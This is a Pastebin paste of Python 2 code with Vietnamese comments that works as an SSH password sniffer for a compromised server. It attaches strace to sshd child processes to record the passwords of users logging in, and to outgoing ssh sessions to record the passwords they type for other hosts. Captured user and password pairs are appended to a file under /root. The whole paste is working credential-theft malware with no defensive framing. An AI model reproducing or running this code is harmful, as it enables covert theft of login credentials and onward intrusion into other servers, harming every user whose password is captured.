Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import subprocess,thread,time,os
- def get_sub(pid): """lay pid con cua mot pid duoc truyen vao"""
- pipe = subprocess.Popen("pgrep -P "+pid,shell=True,stdout=subprocess.PIPE).stdout
- tmp=pipe.read().split("\n")
- return tmp[:len(tmp)-1:]
- """ """
- def split_pw(str):
- x=str.index("(")+1;
- y=str.index(",");
- bg=str[x:y:]
- x=str[::-1].index("=");
- ed=str[len(str)-x::]
- x=str.index("\"")+1;
- y=str[x::].index("\"")+x;
- pw=str[y-1:x:-1]
- pw=pw[:int(ed)-int(bg):]
- return pw[::-1]
- def get_user(pid):
- term="ps aux | grep "+pid+" | grep priv"
- pipe=subprocess.Popen(term,shell=True,stdout=subprocess.PIPE).stdout
- user=pipe.read().split("\n")[0].replace(" ","")
- x=user.index("sshd:")+5
- y=user.index("[")
- return user[x:y:]
- """
- root 24360 0.0 0.6 94896 6912 ? Ss 02:34 0:00 sshd: taind [priv]
- """
- def save(user,pw,str):
- file="/root/save_user.txt"
- f=open(file,"a")
- f.write(str+": "+user+":"+pw+"\n")
- f.close()
- def strace_passwd(pid):
- global straced,root_pid,stracing
- if pid not in stracing:
- stracing.append(pid)
- pw=""
- file=str(int(time.time()))+".sshd" """ tao file"""
- straced.append(pid)
- sub_pw="".join(get_sub(pid))
- strace_cmd="strace -p "+sub_pw+" -e trace=write -o "+file
- os.system(strace_cmd)
- result=open(file,"r").read()
- os.system("rm -rf "+file)
- if "exited with 0" in result:
- result=result.split("\n")
- pw=split_pw(result[len(result)-7].replace(" ",""))
- save(get_user(pid),pw,"Client to Server")
- set_straced(root_pid)
- stracing.remove(pid)
- def strace_sub(root_pid):
- global sub_pid
- while True:
- sub_pid=get_sub(root_pid)
- def set_straced(pid): """truyen vao pid va lay subprocess id"""
- global straced
- straced=get_sub(pid)
- def get_user_ssh(pid):
- usr=""
- term="ps aux | grep "+pid+" | grep 'ssh '"
- pipe=subprocess.Popen(term,shell=True,stdout=subprocess.PIPE).stdout
- user=pipe.read().split("\n")[0].split(" ")
- if "@" not in user[len(user)-1]:
- usr=user[0]+"@"+user[len(user)-1]
- else:
- usr=user[len(user)-1]
- return usr
- def get_pw_ssh(str):
- pw=[];
- passwd="";
- user=""
- str=str.replace(" ","").split("\n")
- str=str[:len(str)-9:]
- for i in str[::-1]:
- if "password:" in i:
- break
- pw.append(i)
- for i in pw[::-1]:
- if "=1"in i:
- x=i.index("\"")+1;y=i[x::].index("\"")+x
- if i[x:y:]!="\\n":
- passwd+=i[x:y:]
- return passwd
- def readfile(file,subpro,pid):
- while True:
- result=open(file,"r").read()
- if "exited with 255" in result:
- subpro.kill()
- os.system("rm -rf "+file)
- break
- if "Welcome to" in result:
- _pw=get_pw_ssh(result);_usr=get_user_ssh(pid)
- subpro.kill()
- os.system("rm -rf "+file)
- save(_usr,_pw,"Server to another")
- break
- def control_ssh(pid):
- global sniffing
- file1=str(int(time.time()))+".ssh"
- open(file1,"w")
- pw_ssh="strace -p "+pid+" -e trace=read,write -o "+file1
- p = subprocess.Popen(pw_ssh,shell=True,stdout=subprocess.PIPE)
- readfile(file1,p,pid)
- def get_sshn():
- global ssh_n
- while True:
- pipe = subprocess.Popen("pidof ssh",shell=True,stdout=subprocess.PIPE).stdout
- ssh_n=pipe.read().replace("\n","").split(" ") """lay pid cua ssh"""
- def sniff_ssh():
- global ssh_c,ssh_n,sniffing
- thread.start_new_thread(get_sshn,())
- while True:
- for i in ssh_n:
- if i not in sniffed and i not in sniffing and i != "":
- sniffing.append(i)
- thread.start_new_thread(control_ssh,(i,))
- pipe = subprocess.Popen("pidof sshd",shell=True,stdout=subprocess.PIPE).stdout """lay pid cua daemon sshd"""
- pid = pipe.read().replace("\n","").split(" ")
- root_pid=pid[len(pid)-1]
- sub_pid=[];
- stracing=[];
- straced=[];
- set_straced(root_pid) """pid cua subprocess"""
- ssh_n=[]; """list ssh id"""
- sniffed=[]; """list da sniff"""
- sniffing=[] """list dang sniff"""
- pipe = subprocess.Popen("pidof ssh",shell=True,stdout=subprocess.PIPE).stdout """lay pid cua ssh dang chay"""
- sniffed=pipe.read().replace("\n","").split(" ")
- thread.start_new_thread(sniff_ssh,())
- thread.start_new_thread(strace_sub,(root_pid,))
- while True:
- tmp_sub=get_sub(root_pid)
- for i in tmp_sub:
- if i not in straced and i not in stracing:
- thread.start_new_thread(strace_passwd,(i,))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement